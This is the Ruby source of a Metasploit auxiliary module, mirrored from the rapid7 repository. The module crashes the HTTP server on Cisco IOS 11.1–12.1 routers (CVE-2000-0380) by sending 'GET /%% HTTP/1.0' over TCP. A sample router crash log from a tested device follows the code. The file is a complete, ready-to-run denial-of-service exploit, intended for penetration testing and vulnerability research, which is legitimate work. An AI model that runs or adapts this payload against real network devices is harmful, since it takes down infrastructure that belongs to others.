Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb
21546 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Cisco IOS HTTP GET /%% Request Denial of Service',

15
        'Description' => %q{

16
          This module triggers a Denial of Service condition in the Cisco IOS

17
          HTTP server. By sending a GET request for "/%%", the device becomes

18
          unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module

19
          tested successfully against a Cisco 1600 Router IOS v11.2(18)P.

20
        },

21
        'Author' => [ 'aushack' ],

22
        'License' => MSF_LICENSE,

23
        'References' => [

24
          [ 'BID', '1154'],

25
          [ 'CVE', '2000-0380'],

26
          [ 'OSVDB', '1302' ],

27
        ],

28
        'DisclosureDate' => '2000-04-26',

29
        'Notes' => {

30
          'Stability' => [CRASH_SERVICE_DOWN],

31
          'SideEffects' => [],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options([

38
      Opt::RPORT(80),

39
    ])

40
  end

41


42
  def run

43
    connect

44


45
    print_status('Sending HTTP DoS packet')

46


47
    sploit = 'GET /%% HTTP/1.0'

48
    sock.put(sploit + "\r\n")

49


50
    disconnect

51
  end

52
end

53


54
=begin

55


56
Patrick Webster 20070915 Cisco 1600 Router IOS v11.2(18)P

57


58
IOS info:

59
  IOS (tm) 1600 Software (C1600-Y-L), Version 11.2(18)P,  RELEASE SOFTWARE (fc1)

60
  Copyright (c) 1986-1999 by cisco Systems, Inc.

61
  Compiled Mon 12-Apr-99 14:53 by ashah

62


63
Example crash:

64


65
  %Software-forced reload

66
  Preparing to dump core...

67
  Router>

68
  *Mar  1 00:03:06.349: %SYS-2-WATCHDOG: Process aborted on watchdog timeout, Process = HTTP Server

69
  -Traceback= 80EE1BC 80F0EC0 80EC004 81C0832 81C0B2E 81C0C76 81C0D68 81C0E4E

70
  Queued messages:

71
  *** EXCEPTION ***

72
  software forced crash

73
  program counter = 0x80eaca6

74
  status register = 0x2700

75
  vbr at time of exception = 0x4000000

76


77
=end

78


79